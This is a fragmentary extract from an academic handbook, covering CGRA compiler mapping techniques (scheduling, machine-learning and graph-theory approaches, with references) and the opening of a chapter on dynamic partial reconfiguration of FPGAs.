evaluated. As a result, the technique has long convergence time, especially
for large dataflow graphs.
Routing through the register files and the register allocation problems are
further explored in De Sutter et al. (2008), which extends the work in Mei
et al. (2003b). Register allocation is achieved by constraining the register
usage during the simulated annealing place and route process. The imposed
constraint is adopted from the meeting graph (Eisenbeis et al. 1995) for
solving loop cyclic register allocation in VLIW processors. In post-routing
phase, the registers are allocated by finding a Hamilton circuit in the meeting
graph, which is solved as a traveling salesman problem (De Sutter et al. 2008).
This technique is specially designed for CGRAs with rotating register files.
Hatanaka and Bagherzadeh (2007) and CGRA-ME (Chin et al. 2017) follow
the simulated annealing framework but aim at finding better cost functions for
over-used resources.
(continued)
14 Coarse-Grained Reconfigurable Array (CGRA) 479
Fig. 7 Node-centric (left) versus edge-centric (right) modulo scheduling (Park et al. 2008a)
(continued)
480 Z. Li et al.
routing the edge. The router will search for an empty slot that can execute
the target operation. Once a suitable slot is found, the mapper will place the
operation and route for other edges.
Figure 7c shows the same example of Fig. 7b, and the consumer is mapped
using an edge-centric approach. The scheduler tries to route edge from P1 to
C first, instead of placing operation C directly. When an empty slot is found,
the scheduler temporarily places the target operation and checks if there are
other edges connected to the consumer; if so, it recursively routes those edges.
For example, when the router visits slot (PE2,1), it temporarily places C there
and recursively calls the router function to route the edge from P2 to C. When
it fails to route the edge from P2 to C, routing resumes from slot (PE2,1), and
not from P1, and a solution is eventually found at slot (PE3,4).
In general, an edge-centric approach can find a solution faster and achieves
better quality mapping compared to a node-centric approach. However, it
has a greedy nature in that it optimizes for a single edge at a time, and the
solution can easily fall into local minima. There is no search mechanism in
the scheduler at the operation level, and every decision made in each step is
final. This problem can be addressed by employing intelligent routing cost
metrics as priorities. The quality of a mapping using specific priorities highly
depends on efficient heuristics for assigning these priority values to both the
operations and the resources.
(continued)
14 Coarse-Grained Reconfigurable Array (CGRA) 481
List Scheduling
A list scheduling algorithm is adapted in the mapping algorithms of Bansal
et al. (2003). Priority-based list scheduling heuristic is used in Bansal et al.
(2003) to map data-dependent operations in the kernel onto spatially close PEs
in the CGRA. Each operation in the kernel is mapped onto a PE considering
the operation priority and ability to route data from already mapped parent
operations. They maintain a PE list based on topology traversal order and an
operation list based on scheduling priority. Topology traversal order is the
order in which PEs are traversed in the CGRA while mapping operations
to PEs. The experiment results show that spiral traversal order performs
best. According to a scheduling priority, the operation list is maintained,
which gives preference to operations on the longest data dependency paths.
Operation with the highest priority is mapped on the next available PE in
the PE list if there is a valid route from already mapped parent operations.
Scheduling is done on a cycle-by-cycle basis. Each cycle, the algorithm
schedules operations on each PE and then increments the cycle when the
PE list is exhausted. This process is continued until all the operations in the
kernel have been scheduled. Unfortunately, the list scheduling algorithms do
not produce a software pipelined schedule and are thus unable to exploit inter-
iteration parallelism.
Evolutionary Algorithm
The mapping approach in Lee et al. (2011) presents a fast heuristic using a
quantum-inspired evolutionary algorithm. This evolutionary algorithm uses
an initial solution obtained from list scheduling as a starting point. The
algorithm uses Q-Bit encoding to represent the hundreds of possible mapping
results and evaluates each case to choose the best solution that satisfies the
(continued)
482 Z. Li et al.
Machine Learning
A reinforcement-learning-based mapping approach for CGRAs has been
proposed in RLMap (Liu et al. 2018). The CGRA mapping problem is
formulated as an agent in reinforcement learning. Each mapping state is
represented as a distinct image that captures operation placement and inter-PE
routing. Agent action is defined as the interchange of operations on neighbor
PEs to keep the action space small. The reward function is defined based on a
cost function that captures interconnect power requirements, utilized compute
PEs, routing PEs, and empty PEs. Reward function helps the agent obtain
valid and high-quality mapping in terms of power, area, and performance.
Inspired by the progress in deep learning, Yin et al. (2017a) proposed
DFGNet, a convolutional neural-network-based mapping approach. They
present dual-input neural network to capture kernel DFG and CGRA architec-
ture. CGRA mapping problem is translated into an image-based classification
problem in a convolutional neural network. Input DFG is represented as an
adjacency matrix, and a matrix represents the CGRA architecture state. The
neural network consists of convolutional, max pooling, concatenate, and fully
connected layers. The issue with any deep learning method for application
mapping on CGRAs is the difficulty in obtaining the abundant training data
required for such approaches.
CGRAs differ in the network and the PE function. Existing compilers
(Wang et al. 2019; Hamzeh et al. 2013; Dave et al. 2018) usually leverage
special characteristics of the architecture to generate quality mapping. These
compilers, however, are usually hand-crafted, making it challenging from the
time-to-market perspective. Li et al. (2022) proposed a portable framework,
LISA, to map DFGs onto diverse CGRAs. LISA uses graph neural network
(GNN) to analyze dataflow graph (DFG) to derive labels that describe how
the DFG should be mapped, e.g., the estimated routing resource required
by an edge and the predicted mapping distance between the DFG nodes.
With trained GNNs, these labels can reflect characteristics of the accelerator.
(continued)
14 Coarse-Grained Reconfigurable Array (CGRA) 483
Graph-Theory-Inspired Techniques
Many CGRA mapping approaches use graph theory concepts to formulate the
CGRA mapping problem. Those approaches transform the CGRA mapping problem
into well-known graph-theoretic formulations and leverage the existing techniques
to solve the problem. This section categorizes the graph-theory-inspired mapping
techniques based on the graph theory formalism they use. We also discuss, in more
detail, prominent CGRA mapping techniques that correspond to each formalization.
Table 1 summarizes different aspects of five such notable works.
Following graph theory, concepts are widely used to formalize and solve CGRA
application mapping problem:
1. Subgraph homeomorphism
2. Graph epimorphism
3. Graph minor
4. Compatibility graph
5. Graph drawing
To understand the above graph theory concepts, we need to first present few
related definitions. Therefore, let us first look at the definitions of graph isomor-
phism, graph subdivision, graph homeomorphism, and induced subgraph.
Table 1 Notable works using graph theory concepts for CGRA mapping problem
Graph theory
Work concept Solution What is new?
Alle et al. (2008) Homeomorphism Greedy algorithm for Mapping DFG
transformation substructures
EpiMap (Hamzeh Epimorphism Heuristic-based Recomputation to
et al. 2012) search solve out-degree
problem
Graph Minor (Chen Graph Minor Tree search method Allow route sharing
and Mitra 2014)
RegiMap (Hamzeh Compatibility graph Finding a max clique Allow both route
et al. 2013) sharing,
recomputation
SPKM (Yoon et al. Graph Drawing Split and push Support
2009) approach heterogeneous
architectures
14 Coarse-Grained Reconfigurable Array (CGRA) 485
Two graphs are isomorphic when both graphs contain the same number of
vertices connected in the same way. Figure 8 shows two isomorphic graphs. Graph
isomorphism is an equivalence relation on directed graphs.
Subgraph-Homeomorphism-Based Techniques
Formal definition of subgraph homeomorphism is as follows:
(continued)
14 Coarse-Grained Reconfigurable Array (CGRA) 487
Fig. 11 Subgraph homeomorphism formulation of CGRA mapping problem. (a) DFG (b) CGRA
(c) MRRG
Graph-Epimorphism-Based Technique
Graph epimorphism is defined based on graph homomorphism. Therefore, let
us first look at the definition of graph homomorphism. A graph homomor-
phism defines a mapping between two graphs in which adjacent vertices in
the first graph are mapped to adjacent vertices in the second graph. Unlike
isomorphism, homomorphism can be from a bigger to a smaller graph. The
formal definition of a homomorphism is as follows:
Fig. 12 A valid mapping without using recomputation (left) versus with recomputation (right) in
EpiMap (Hamzeh et al. 2012)
Graph-Minor-Based Technique
(continued)
490 Z. Li et al.
• The graphs φ(v)|v ∈ V are mutually vertex disjoint, and the edges
φ(e)|e ∈ E are pairwise distinct.
• If e = (u, v) ∈ E, the edge φ(e) connects φ(u) with φ(v).
Graph minor (Chen and Mitra 2014) models the CGRA mapping problem
as a graph minor containment problem that can explicitly model route sharing.
As explained in the definition, a graph H is a minor of graph G if H can
be obtained from a subgraph of G by a (possibly empty) sequence of edge
contractions (Robertson and Seymour 1990). The graph minor is initially
defined for undirected graphs, but the authors in Chen and Mitra (2014)
adapt the definition to directed graphs for CGRA mapping. In this context,
we need to test if the DFG is a minor of the MRRG, where the edges
to be contracted represent the routing paths in the MRRG. The mapping
algorithm is inspired by the tree search method, which is widely used to solve
graph matching problems. Unlike edge subdivision (or its reverse operation
smoothing), edge contractions are not restricted to simple paths. Thus graph
minor formalism naturally allows for route sharing. Figure 13 shows the
difference between mappings under graph minor approach (Fig. 13d) and
subgraph homeomorphism approach (Fig. 13c). The number of routing nodes
is reduced from 3 (in subgraph homeomorphism mapping) to 2 (in graph
minor mapping) through route sharing.
Compatibility-Graph-Based Technique
REGIMap (Hamzeh et al. 2013) presents a general formulation of the problem
of mapping a kernel on the CGRA while using its registers to minimize
II. The formulation partitions the problem into a scheduling problem and
an integrated placement and register allocation problem. They first create a
compatibility graph, a subgraph of the product of the DFG G and MRRG H .
The vertices of the compatibility graph denote the operation–resource pair,
which represent possible mapping pairs. The edges of the graph denote the
compatibility of two corresponding mapping pairs. The mapping problem
is reduced to one of finding the largest clique in the compatibility graph
under the constraints of register resources. Then an efficient and constructive
heuristic is used to solve the mapping problem.
14 Coarse-Grained Reconfigurable Array (CGRA) 491
Fig. 13 Subgraph homeomorphism (left) versus graph minor formulation (Chen and Mitra 2014)
(right) of CGRA mapping problem
Graph-Drawing-Based Technique
SPKM (Yoon et al. 2009) adopts the split and push technique (Di Battista
et al. 1998) for planar graph drawing and focuses on spatial mappings for
CGRAs. The mapping in SPKM starts from an initial drawing where all DFG
nodes reside in the same group. One group represents a single processing
element. The group is then split into two, and a set of nodes are pushed to the
newly generated group. The split process continues until each group contains
only one node, representing a one-to-one map ping from DFG to the planar
resource graph of CGRA.
492 Z. Li et al.
Fig. 14 Memory-aware loop mapping on CGRA. (a) DFG of the array-addition loop kernel. (b)
Mapping of array-addition loop kernel
14 Coarse-Grained Reconfigurable Array (CGRA) 493
are interdependent tasks. Host CPU manages the data movement using a DMA
controller based on the data placement decided by the compiler.
This section discusses compiler-based solutions for challenges related to data
access in CGRA.
Memory-Aware Compilation
Effective memory-aware compiling strategy should:
(continued)
494 Z. Li et al.
multiple times to support imperfect nested loops when only the innermost loop body
is mapped to the CGRA. Multiple invocations lead to overheads, including pipeline
filling/draining and the initialization of loop variables and pipeline parameters on
the CGRA.
Mapping Approaches
We categorize existing works for nested loop mapping based on their
approach.
Loop Flattening Based Loop flattening can convert imperfect loop nests
into a single nested loop and can be executed in a single invocation.
However, loop flattening comes with the overhead of increased code size.
Lee et al. (2014) argue that overhead from increased code size is lower
than the overheads from multiple invocations. To limit the negative impact
of loop flattening, they combine loop fission with flattening and introduce
few specialized operations to CGRA PEs called nested iterators, extended
accumulator, and periodic store.
Application-Level Mapping
An application usually has several kernels, which can be a sequential code, a single
loop, or multiple loops, or any combination of them. CGRA can reconfigure the
functionality of PE and the routing of on-chip network to accelerate any kernel.
Application-specific integrated circuits (ASICs) always target-specific kernels and
lose the flexibility to process other kernels. Field-programmable gate array (FPGA)
can be reconfigured to accelerate any kernel. Due to the time cost of reconfiguration,
however, FPGA cannot change the configuration frequently to execute different
kernels. When mapping an application, FPGA usually needs to map all the target
kernels spatially, which is limited by the area and cannot do a spatio-temporal
mapping. On the contrary, CGRA can reconfigure the PE and on-chip network per
cycle, thus leading to a spatio-temporal mapping.
(continued)
14 Coarse-Grained Reconfigurable Array (CGRA) 497
(continued)
Fig. 16 Comparison between a Spatial and Spatio-Temporal mapping. (a) Spatial mapping. (b)
Spatio-temporal mapping
14 Coarse-Grained Reconfigurable Array (CGRA) 499
mapping regular highly parallel kernels, as mentioned in the nested loop mapping
section (Wijerathne et al. 2021a,b). Similar approaches of exploring multi-level
parallelism have been studied in the context of FPGAs (Zhong et al. 2014, 2016,
2017).
Conclusions
References
Ahn M, Yoon JW, Paek Y, Kim Y, Kiemb M, Choi K (2006) A spatial mapping algorithm for
heterogeneous coarse-grained reconfigurable architectures. In: Proceedings of the Conference
on Design, Automation and Test in Europe: Proceedings. European Design and Automation
Association, pp 363–368
Alle M, Varadarajan K, Ramesh RC, Nimmy J, Fell A, Rao A, Nandy S, Narayan R (2008)
Synthesis of application accelerators on runtime reconfigurable hardware. In: 2008 International
Conference on Application-Specific Systems, Architectures and Processors. IEEE, Munich,
Germany, pp 13–180
Amdahl GM (1967) Validity of the single processor approach to achieving large scale computing
capabilities. In: Proceedings of the Spring Joint Computer Conference, 18–20 Apr, 1967,
pp 483–485
Bandara TK, Wijerathne D, Mitra T, Peh LS (2022) REVAMP: a systematic framework for
heterogeneous CGRA realization. In: 27th ACM International Conference on Architectural
Support for Programming Languages and Operating Systems (ASPLOS). ACM, Lausanne,
Switzerland
Bansal N, Gupta S, Dutt N, Nicolau A (2003) Analysis of the performance of coarse-grain recon-
figurable architectures with different processing element configurations. Proc. of Workshop on
Application Specific Processors, vol. 12
Baumgarte V, Ehlers G, May F, Nückel A, Vorbach M, Weinhardt M (2003) PACT XPP – a self-
reconfigurable data processing architecture. J Supercomput 26(2):167–184
Betz V, Rose J (1997) VPR: a new packing, placement and routing tool for FPGA research.
In: International Workshop on Field Programmable Logic and Applications. Springer, Berlin
Heidelberg, 1, pp 213–222
Brenner JA, Fekete SP, Van Der Veen JC (2009) A minimization version of a directed subgraph
homeomorphism problem. Math Methods Oper Res 69(2):281–296
14 Coarse-Grained Reconfigurable Array (CGRA) 501
Burns GF, Jacobs M, Lindwer M, Vandewiele B (2004) Exploiting parallelism, while managing
complexity using Silicon Hive programming tools. White paper vol. 42, p. 43, 2004.
Cao P, Liu B, Yang J, Yang J, Zhang M, Shi L (2017) Context management scheme optimization of
coarse-grained reconfigurable architecture for multimedia applications. IEEE Trans Very Large
Scale Integr (VLSI) Syst 17, 2321–2331
Carballo J-A, Chan W-TJ , Gargini PA, Kahng AB, Nath S (2014) ITRS 2.0: toward a re-framing
of the semiconductor technology roadmap. In: 2014 IEEE 32nd International Conference on
Computer Design (ICCD). IEEE, pp 139–146
Chaudhuri S, Hetzel A (2017) SAT-based compilation to a non-vonNeumann processor. In:
Proceedings of the 36th International Conference on Computer-Aided Design. IEEE Press,
Irvine, CA, USA, pp 675–682
Chen L, Mitra T (2014) Graph minor approach for application mapping on CGRAs. ACM Trans
Reconfig Technol Syst (TRETS) 7(3):1–25
Chen Y-H, Yang T-J, Emer J, Sze V (2019) Eyeriss v2: a flexible accelerator for emerging deep
neural networks on mobile devices. IEEE J Emerg Sel Top Circuits Syst 9(2):292–308
Chin SA, Anderson JH (2018) An architecture-agnostic integer linear programming approach
to CGRA mapping. In: 2018 55th ACM/ESDA/IEEE Design Automation Conference (DAC).
IEEE, pp 1–6
Chin SA, Sakamoto N, Rui A, Zhao J, Kim JH, Hara-Azumi Y, Anderson J (2017) CGRA-ME:
a unified framework for CGRA modelling and exploration. In: 2017 IEEE 28th International
Conference on Application-Specific Systems, Architectures and Processors (ASAP). IEEE,
Seattle, WA, USA, pp 184–189
Choi K (2011) Coarse-grained reconfigurable array: architecture and application mapping. IPSJ
Trans Syst LSI Des Methodol 4:31–46
Compton K, Hauck S (2002) Reconfigurable computing: a survey of systems and software. ACM
Comput Surv (csuR) 34(2):171–210
Dally WJ, Turakhia Y, Han S (2020) Domain-specific hardware accelerators. Commun ACM
63(7):48–57
DARPA software defined hardware (2019). Online. Available: https://www.darpa.mil/program/
software-defined-hardware
Dave S, Balasubramanian M, Shrivastava A (2018) RAMP: resource-aware mapping for CGRAs.
In: 2018 55th ACM/ESDA/IEEE Design Automation Conference (DAC). IEEE, San Francisco,
CA, USA, pp 1–6
Dennard RH, Gaensslen FH, Yu H-N, Rideout VL, Bassous E, LeBlanc AR (1974) Design of
ion-implanted MOSFET’s with very small physical dimensions. IEEE J Solid-State Circuits
9(5):256–268
De Sutter B, Coene P, Vander Aa T, Mei B (2008) Placement-and-routing-based register allocation
for coarse-grained reconfigurable arrays. In: Proceedings of the 2008 ACM SIGPLAN-SIGBED
Conference on Languages, Compilers and Tools for Embedded System, ser. LCTES’08. ACM,
Tucson, Arizona, USA, pp 151–160
Di Battista G, Patrignani M, Vargiu F (1998) A split&push approach to 3D orthogonal drawing.
In: International Symposium on Graph Drawing. Springer, Berlin, Heidelberg, pp 87–101
Eisenbeis C, Lelait S, Marmol B (1995) The meeting graph: a new model for loop cyclic register
allocation. In: Proceedings of the 1995 International Federation for Information Processing
Working Group, pp 264–267
Emani M, Vishwanath V, Adams C, Papka ME, Stevens R, Florescu L, Jairath S, Liu W, Nama T,
Sujeeth A (2021) Accelerating scientific applications with SambaNova reconfigurable dataflow
architecture. Comput Sci Eng 23(2):114–119
Fleming KE, Glossop KD, Steely SC Jr, Tang J, Gara AG et al (2020) Processors, methods, and
systems with a configurable spatial accelerator. US Patent 10,558,575, 11 Feb 2020
Fortune S, Hopcroft J, Wyllie J (1980) The directed subgraph homeomorphism problem. Theor
Comput Sci 10(2):111–121
502 Z. Li et al.
Kuon I, Rose J (2007) Measuring the gap between FPGAs and ASICs. IEEE Trans Comput-Aided
Des Integr Circuits Syst 26(2):203–215
Kuon I, Tessier R, Rose J (2008) FPGA architecture: survey and challenges. Now Publishers Inc.,
Hanover, MA 02339 USA
Kwong J, Chandrakasan AP (2011) An energy-efficient biomedical signal processing platform.
IEEE J Solid-State Circuits 46(7):1742–1753
Lee P, Kedem ZM (1990) Mapping nested loop algorithms into multidimensional systolic arrays.
IEEE Trans Parallel Distrib Syst 1(1):64–76
Lee G, Choi K, Dutt ND (2011) Mapping multi-domain applications onto coarse-grained reconfig-
urable architectures. IEEE Trans Comput-Aided Des Integr Circuits Syst 30(5):637–650
Lee J, Seo S, Lee H, Sim HU (2014) Flattening-based mapping of imperfect loop nests for CGRAs.
In: Proceedings of the 2014 International Conference on Hardware/Software Codesign and
System Synthesis. ACM, Uttar Pradesh, India, p 9
Lee H, Nguyen D, Lee J (2015) Optimizing stream program performance on CGRA-based systems.
In: Proceedings of the 52nd Annual Design Automation Conference, pp 1–6
Li S, Ebeling C (2008) QuickRoute: a fast routing algorithm for pipelined architectures. In:
Proceedings on Field-Programmable Technology, 2004. IEEE International Conference. IEEE,
Brisbane, NSW, Australia, pp 73–80
Li Z, Wijerathne D, Chen X, Pathania A, Mitra T (2021) ChordMap: automated mapping
of streaming applications onto CGRA. IEEE Trans Comput-Aided Des Integr Circuits Syst
41(2):306–319
Li Z, Wu D, Wijerathne D, Mitra T (2022) LISA: graph neural network based portable mapping on
spatial accelerators. In: 2022 IEEE International Symposium on High-Performance Computer
Architecture (HPCA). IEEE, Seoul, Korea (South)
Liu D, Yin S, Liu L, Wei S (2013) Polyhedral model based mapping optimization of loop nests
for CGRAs. In: Proceedings of the 50th Annual Design Automation Conference. ACM, San
Francisco, CA, USA, p 19
Liu D, Yin S, Luo G, Shang J, Liu L, Wei S, Feng Y, Zhou S (2018) Data-flow graph mapping
optimization for CGRA with deep reinforcement learning. IEEE Trans Comput-Aided Des
Integr Circuits Syst 38(12):2271–2283
Liu L, Zhu J, Li Z, Lu Y, Deng Y, Han J, Yin S, Wei S (2019) A survey of coarse-grained
reconfigurable architecture and design: taxonomy, challenges, and applications. ACM Comput
Surv (CSUR) 52(6):1–39
Lu W, Yan G, Li J, Gong S, Han Y, Li X (2017) FlexFlow: a flexible dataflow accelerator
architecture for convolutional neural networks. In: 2017 IEEE International Symposium on High
Performance Computer Architecture (HPCA). IEEE, Austin, TX, USA, pp 553–564
McMurchie L, Ebeling C (2008) PathFinder: a negotiation-based performance-driven router for
FPGAs. In: Reconfigurable computing. Elsevier, Burlington, Massachusetts, pp 365–381
Mei B, Vernalde S, Verkest D, De Man H, Lauwereins R (2002) DRESC: a retargetable compiler
for coarse-grained reconfigurable architectures. In: 2002 IEEE International Conference on
Field-Programmable Technology, 2002 (FPT). Proceedings. IEEE, Hong Kong, China, pp 166–
173
Mei B, Vernalde S, Verkest D, De Man H, Lauwereins R (2003a) ADRES: an architecture with
tightly coupled VLIW processor and coarse-grained reconfigurable matrix. In: Proceedings of
the 13th International Conference on Field Programmable Logic and Application, ser. FPL’03.
Springer, Berlin Heidelberg, pp 61–70
Mei B, Vernalde S, Verkest D, De Man H, Lauwereins R (2003b) Exploiting loop-level parallelism
on coarse-grained reconfigurable architectures using modulo scheduling. In: Proceedings of the
2003 Conference on Design, Automation and Test in Europe, ser. DATE’03. IEEE, Munich,
Germany, pp 296–301
Mitra T (2015) Heterogeneous multi-core architectures. Inf Media Technol 10(3):383–394
Moore GE et al (1998) Cramming more components onto integrated circuits. Proceedings of the
IEEE 86(1): 82–85
504 Z. Li et al.
Nicol C (2017) A coarse grain reconfigurable array (CGRA) for statically scheduled data flow
computing. Wave Computing White Paper
Nowatzki T, Gangadhar V, Ardalani N, Sankaralingam K (2017) Stream-dataflow acceleration.
In: 2017 ACM/IEEE 44th Annual International Symposium on Computer Architecture (ISCA).
IEEE, Toronto, ON, Canada, pp 416–429
Park H, Fan K, Mahlke SA, Oh T, Kim H, Kim H-S (2008a) Edge-centric modulo scheduling
for coarse-grained reconfigurable architectures. In: Proceedings of the 17th International Con-
ference on Parallel Architectures and Compilation Techniques, ser. PACT’08. ACM, Toronto,
Ontario, Canada, pp 166–176
Park H, Fan K, Mahlke SA, Oh T, Kim H, Kim H-S (2008b) Edge-centric modulo scheduling
for coarse-grained reconfigurable architectures. In: Proceedings of the 17th International
Conference on Parallel Architectures and Compilation Techniques, pp 166–176
Patterson DA (2006) Future of computer architecture. In: Berkeley EECS Annual Research
Symposium (BEARS), College of Engineering, UC Berkeley, US
Podobas A, Sano K, Matsuoka S (2020) A survey on coarse-grained reconfigurable architectures
from a performance perspective. IEEE Access 8:146719–146743
Prabhakar R, Zhang Y, Koeplinger D, Feldman M, Zhao T, Hadjis S, Pedram A, Kozyrakis C,
Olukotun K (2017) Plasticine: a reconfigurable architecture for parallel patterns. In: 2017
ACM/IEEE 44th Annual International Symposium on Computer Architecture (ISCA). IEEE,
Toronto, ON, Canada, pp 389–402
Rashid M, Imran M, Jafri AR, Al-Somani TF (2019) Flexible architectures for cryptographic
algorithms – a systematic literature review. J Circuits Syst Comput 28(03):1930003
Rau BR (1994) Iterative modulo scheduling: an algorithm for software pipelining loops. In:
Proceedings of the 27th Annual International Symposium on Microarchitecture. ACM, San
José, CA, USA, pp 63–74
Robertson N, Seymour PD (1990) Graph minors. IX. Disjoint crossed paths. J Comb Theory Ser
B 49(1):40–77
Shao YS, Reagen B, Wei G-Y, Brooks D (2015) The Aladdin approach to accelerator design and
modeling. IEEE Micro 35(3):58–70
Singh H, Lee MH, Lu G, Kurdahi FJ, Bagherzadeh N, Chaves Filho EM (2000) MorphoSys: an
integrated reconfigurable system for data-parallel and computation-intensive applications. IEEE
Trans Comput 49(5):465–481
Singh H, Lee M-H, Lu G, Kurdahi FJ, Bagherzadeh N, Chaves Filho EM (2000) MorphoSys: an
integrated reconfigurable system for data-parallel and computation-intensive applications. IEEE
Trans Comput 49(5):465–481
Suh D, Kwon K, Kim S, Ryu S, Kim J (2012) Design space exploration and implementation of a
high performance and low area coarse grained reconfigurable processor. In: 2012 International
Conference on Field-Programmable Technology. IEEE, Seoul, Korea (South), pp 67–70
Tu F, Yin S, Ouyang P, Tang S, Liu L, Wei S (2017) Deep convolutional neural network architecture
with reconfigurable computation patterns. IEEE Trans Very Large Scale Integr (VLSI) Syst
25(8):2220–2233
Tuhin MAA, Norvell TS (2008) Compiling parallel applications to coarse-grained reconfigurable
architectures. In: 2008 Canadian Conference on Electrical and Computer Engineering. IEEE,
Niagara Falls, ON, Canada, pp 001723–001728
Venkataramani S, Choi J, Srinivasan V, Wang W, Zhang J, Schaal M, Serrano MJ, Ishizaki K, Inoue
H, Ogawa E et al (2019) DeepTools: compiler and execution runtime extensions for rapid AI
accelerator. IEEE Micro 39(5):102–111
Wang Y, Li P, Zhang P, Zhang C, Cong J (2013) Memory partitioning for multidimensional arrays
in high-level synthesis. In: Proceedings of the 50th Annual Design Automation Conference,
pp 1–8
Wang B, Karunarathne M, Kulkarni A, Mitra T, Peh L-S (2019) HyCUBE: a 0.9 V 26.4
MOPS/mW, 290 pJ/op, power efficient accelerator for IoT applications. In: 2019 IEEE Asian
Solid-State Circuits Conference (A-SSCC). IEEE, Austin, TX, USA, pp 133–136
14 Coarse-Grained Reconfigurable Array (CGRA) 505
Contents
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 508
FPGA Configuration . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 510
Designing Partially Reconfigurable Systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 512
Managing Partial Reconfiguration . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 517
Applications of Dynamic Partial Reconfiguration . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 519
Computing Infrastructure and Virtualization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 520
Design Compilation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 521
Adaptive Systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 522
Machine Learning . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 524
Reliability and Harsh Environments . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 524
Research Directions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 525
Conclusions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 526
References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 526
Abstract
S. A. Fahmy ()
King Abdullah University of Science and Technology (KAUST), Department of Computer,
Electrical and Mathematical Sciences and Engineering, Thuwal, Saudi Arabia
e-mail: [email protected]
K. B. Iyer
Computer Science, King Abdullah University of Science and Technology, Thuwal, Saudi Arabia
e-mail: [email protected]
Keywords
Introduction
LUT
FF
O
6:1
CLK
Fig. 1 Configuration of a simplified logic element showing 64-bit LUT6 contents determining
logic function, flip-flop as latch with initial state, and multiplexer select pins set by the values in
the configuration memory
Fig. 2 Configuration of a
route between two logic LB
blocks through configuring
the connection boxes and the
switch box to connect them
LB
device. This opens the door to hardware designs where parts can be modified at
runtime based on functional needs. A static region contains the parts of the hardware
design that remain active throughout operation, while one or more partial regions
contain functionality which can be swapped out during operation.
This capability has found use in a variety of applications, such as cognitive radio
systems that modify their hardware baseband processing depending on operating
requirements, computer vision systems that adapt the type of image processing
depending on the properties of the scene, virtualization of FPGA interfaces for gen-
eralized accelerator deployments, and resilient designs that are robust to radiation
effects in space.
This chapter discusses the mechanisms that enable dynamic and partial recon-
figuration and how to design such systems and gives examples of applications that
exploit these capabilities. Future challenges in this research area are also identified.
Various existing surveys delve into these aspects in more detail and the authors
510 S. A. Fahmy and K. B. Iyer
are referred to these (Compton and Hauck (2002), Koch (2012), Vipin and Fahmy
(2018), and Vaishnav et al. (2018)).
FPGA Configuration
One of the obstacles to wider adoption of PR has been design complexity. Most
FPGA designers are content with writing RTL code and letting FPGA tools manage
the complexity of mapping to the target architecture. Indeed, in such cases, the
designer need not know much about the types of resources on the FPGA and their
arrangement in silicon. Optimization for high frequency tends to require both some
understanding of the underlying hardware primitives and, potentially, some spatial
floorplanning, wherein the location of hardware primitives is fixed. However, this
remains a specialist skill. Designing a PR system on FPGA requires awareness of
this physical arrangement and consideration of its features at a finer level than many
designers consider. FPGA tool vendors have been improving their tools recently,
but this additional complexity remains a barrier to entry. The PR development flows
from both AMD/Xilinx and Intel/Altera follow a similar structure.
For consistency, a common terminology is defined first. PR development requires
the area of the FPGA to be divided into a static region (SR) and one or more partially
reconfigurable regions (PRRs). The static region hosts the static module, which
is initialized once during the configuration lifetime (until power-off). The static
module can include logic to manage partial reconfiguration, such as communication
with the ICAP or decoupling signal circuitry.
The partially reconfiguration regions (PRRs) can be reconfigured multiple times
during system lifetime. Reconfigurable modules (RMs) are the designs configured
into the PRRs. A configuration is a valid combination of the SR and a set of
RMs allocated to the PRRs in the design. A full bitstream includes the static
module and an RM instance for each PRR. A partial bitstream only contains an
instance of an RM for a particular PRR. Figure 3 shows these regions and the
associated bitstreams. In generating partial bitstreams for RMs, these are validated
against the static module to ensure correctness and compatibility. Subsequently, all
bitstreams, including static and partial, must be generated prior to configuration.
Since both static and partial bitstreams must be generated through the full hardware
implementation flow, which is time-consuming, their functionality, arrangement,
and design must be determined up front.
Signals that interface the SR and PRRs must be locked in place (which is now
automated by the tools), so that the multiple RMs all route their matching interfaces
to these signals. RMs in the same PRR can have different interface signals, but the
SR must implement all the required signals to interface with them.
The PR design tools start by synthesizing all RMs separately. The SR is also
synthesized with the RMs replaced by black boxes, i.e., empty modules. Only during
the implementation stage are the synthesized netlists of the RMs populated into the
black boxes.
PRRs must be drawn manually in the implementation stage, ensuring they align
with clock region boundaries. It’s preferred that PRRs are rectangularly shaped in
order to have uniformity in resources; any other shape is likely to cause routing
congestion (Xilinx 2023).
15 Dynamic and Partial Reconfiguration of FPGAs 513
Full.2
Full.1
Static
St ti
+
Static
SR Partial
+
{A.1, B.1}
Part
{A.1, B.2}
PRR B
PartB.3
PartB.2
PartB.1
PRR A
PartA.2
PartA.1
Fig. 3 A partially reconfigurable design comparing a static region (SR) and two partially
reconfigurable regions (PRRs), A and B. Full bitstreams can be used to configure the whole
FPGA, while partial bitstreams allow individual PRRs to be configured to a specific function. The
granularity of regions is limited to device-specific constraints based on clock regions and resource
arrangements
Additionally, not all resources are reconfigurable. LUTs, FFs, DSPs, CMACs,
PCIe interfaces, clocks, and clocks modifying logic such as BUFG, PLL, etc., are
reconfigurable. Similarly, I/O and I/O-related components such as drive strength,
driver output impedance, SERDES, etc., are also reconfigurable. However, compo-
nents such as BSCAN, JTAG, and ICAP are not reconfigurable.
One RM for each PRR is incorporated and a complete netlist (comprising the
SR and an RM for each PRR) is generated. At this point, the static design is
locked, meaning that its physical use of resources is fixed. Subsequent RMs are
swapped into each PRR, and the same process repeated to determine their own
implementation.
Netlists are generated for all configurations defined by the designer, resulting
